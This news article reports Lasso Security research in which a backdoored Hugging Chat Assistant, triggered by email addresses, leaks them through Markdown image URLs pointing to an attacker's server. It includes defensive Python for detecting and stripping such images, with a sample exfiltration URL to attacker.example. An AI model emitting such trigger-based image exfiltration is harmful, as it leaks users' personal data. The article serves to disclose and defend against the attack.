Hugging Chat Assistants do not appear to be sufficiently secure to prevent data exfiltration. Researchers managed to obtain users’ email addresses through an assistant they developed themselves. Hackers can abuse this free platform for the same purpose.



Hackers can develop Hugging Chat Assistants that help them obtain sensitive information. The platform was designed for creating and sharing self-developed chatbots, which basically makes it a free competitor to the GPT Store. It turns out, however, that chatbots can also be developed with bad intentions.

Getting hold of sensitive data

The researchers at Lasso Security built and shared a chatbot on Hugging Chat Assistants that collected users’ email addresses. To do this, they combined the Sleepy Agent technique with the Image Markdown Rendering vulnerability. The former is a manipulation technique that makes LLMs perform malicious actions on specific triggers. In the study, the email address was the trigger. The vulnerability is then used to get the data out: when the chatbot’s reply contains a Markdown image whose URL includes the email address, rendering that image sends the address to a server the attacker controls. In this way, the hacker gains access to sensitive data that a user shares with a chatbot.
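
To make the leak concrete, here is a minimal sketch of how a chatbot reply could be checked for image URLs that carry an email address. It is not the researchers’ code: the function name `find_leaky_images`, the two regular expressions, and the `attacker.example` host are assumptions made for illustration, and the pattern only covers simple `![alt](url)` images.

```python
import re
from urllib.parse import unquote, urlparse

# Simplified pattern for Markdown images of the form ![alt](url).
# Assumption: no title text and no spaces inside the URL.
IMAGE_MD = re.compile(r"!\[[^\]]*\]\((\S+?)\)")

# Rough email pattern, good enough for a demonstration.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def find_leaky_images(reply: str) -> list[tuple[str, str]]:
    """Return (host, email) pairs for image URLs that contain an email address."""
    hits = []
    for url in IMAGE_MD.findall(reply):
        decoded = unquote(url)  # turn %40 back into @ before searching
        host = urlparse(url).hostname or ""
        for email in EMAIL.findall(decoded):
            hits.append((host, email))
    return hits


if __name__ == "__main__":
    # Hypothetical reply from a manipulated assistant.
    reply = "Thanks! ![img](https://attacker.example/pixel.png?e=alice%40example.com)"
    print(find_leaky_images(reply))
```

The point of the sketch is that nothing in the reply looks suspicious to the user: the image may be a single invisible pixel, while the request for it already carries the address.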

The research shows that Hugging Face has not taken sufficient measures to counter the creation of dangerous chatbots. Exploiting this requires knowledge of LLM development, but apart from that, the criminal activity carries no costs. In the example chatbot, the researchers targeted email addresses, but hackers can also mark other sensitive data as triggers.

No modifications by Hugging Face

Hugging Face responded to the researchers’ findings and does not believe any changes should be made to the platform. According to the open-source AI platform, the responsibility lies with the user, who should read over an AI agent’s system prompt before initial use.

However, the researchers note that commercial parties have taken more measures and blocked Dynamic Image Rendering. They also point out that users of Hugging Chat Assistants cannot possibly keep track of every modification made to the system prompts of the AI agents they use. Hackers can, of course, still add manipulation techniques to the LLM after an AI tool has been released.
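
How such blocking works at the commercial parties is not described in the research as reported here. As an illustration only, the sketch below shows one possible approach: before a reply is rendered, every Markdown image that points to a host outside an allowlist is replaced with a placeholder. The function `strip_untrusted_images` and the contents of `ALLOWED_IMAGE_HOSTS` are hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would choose its own hosts.
ALLOWED_IMAGE_HOSTS = frozenset({"huggingface.co"})

# Simplified pattern for Markdown images of the form ![alt](url).
IMAGE_MD = re.compile(r"!\[([^\]]*)\]\((\S+?)\)")


def strip_untrusted_images(reply: str, allowed=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace images from non-allowlisted hosts with a text placeholder."""

    def replace(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""
        if host in allowed:
            return match.group(0)  # keep trusted images unchanged
        return "[external image removed]"

    return IMAGE_MD.sub(replace, reply)


if __name__ == "__main__":
    reply = "Hi ![x](https://attacker.example/p.png?e=a%40b.co) there"
    print(strip_untrusted_images(reply))
```

Because the image is never rendered, the browser never requests the attacker’s URL, so the data in it is not sent, even if the LLM itself has been manipulated.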

The best advice here is to be careful about feeding sensitive data to AI tools.